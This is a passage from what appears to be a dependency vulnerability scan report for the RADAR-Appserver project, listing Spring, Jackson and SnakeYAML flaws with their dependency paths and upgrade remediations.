Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
Overview
org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.
Affected versions of this package are vulnerable to Incorrect Authorization via the AnnotationsScanner and AnnotatedMethod class. An attacker can gain unauthorized access to sensitive information by exploiting improper resolution of annotations on methods within type hierarchies that use parameterized supertypes with unbounded generics.
Note:
This is only exploitable if security annotations are used on methods in generic superclasses or generic interfaces and the @EnableMethodSecurity feature is enabled.
Remediation
Upgrade org.springframework:spring-core to version 6.2.11 or higher.
References
high severity
new
- Vulnerable module: tools.jackson.core:jackson-core
- Introduced through: org.springframework.boot:spring-boot-starter-web@4.1.0-M4
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-jackson@4.1.0-M4 › tools.jackson.core:jackson-databind@3.1.0 › tools.jackson.core:jackson-core@3.1.0
Overview
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the enforcement of document length constraints in blocking, async, and DataInput parser processes. An attacker can cause excessive resource consumption by submitting oversized JSON documents that bypass configured size limits.
Remediation
Upgrade tools.jackson.core:jackson-core to version 3.1.1 or higher.
References
high severity
- Vulnerable module: org.springframework:spring-web
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-web@4.1.0-M4 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
Overview
org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.
Affected versions of this package are vulnerable to Open Redirect when UriComponentsBuilder parses an externally provided URL, and the application subsequently uses that URL. If it contains hierarchical components such as path, query, and fragment it may evade validation.
Remediation
Upgrade org.springframework:spring-web to version 5.3.32, 6.0.17, 6.1.4 or higher.
References
high severity
- Vulnerable module: org.springframework:spring-web
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-web@4.1.0-M4 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
Overview
org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.
Affected versions of this package are vulnerable to Open Redirect when using UriComponentsBuilder to parse an externally provided URL and perform validation checks on the host of the parsed URL.
Note: This is the same as CVE-2024-22243, but with different input.
Remediation
Upgrade org.springframework:spring-web to version 5.3.33, 6.0.18, 6.1.5 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-web
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-web@4.1.0-M4 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
Overview
org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.
Affected versions of this package are vulnerable to Denial of Service (DoS) in the form of improper ETag prefix validation when parsing ETags from the If-Match or If-None-Match request headers. An attacker can exploit this vulnerability to cause denial of service by sending a maliciously crafted conditional HTTP request.
Workaround
Users of older, unsupported versions could enforce a size limit on If-Match and If-None-Match headers, e.g. through a Filter.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade org.springframework:spring-web to version 5.3.38, 6.0.23, 6.1.12 or higher.
References
medium severity
- Vulnerable module: org.yaml:snakeyaml
- Introduced through: org.liquibase:liquibase-core@4.20.0, org.liquibase.ext:liquibase-hibernate6@4.20.0 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.liquibase:liquibase-core@4.20.0 › org.yaml:snakeyaml@1.33Remediation: Upgrade to org.liquibase:liquibase-core@4.21.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.liquibase.ext:liquibase-hibernate6@4.20.0 › org.liquibase:liquibase-core@4.20.0 › org.yaml:snakeyaml@1.33Remediation: Upgrade to org.liquibase.ext:liquibase-hibernate6@4.21.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.yaml:snakeyaml@1.33
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.yaml:snakeyaml@1.33
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.yaml:snakeyaml@1.33
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.yaml:snakeyaml@1.33
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.yaml:snakeyaml@1.33
-
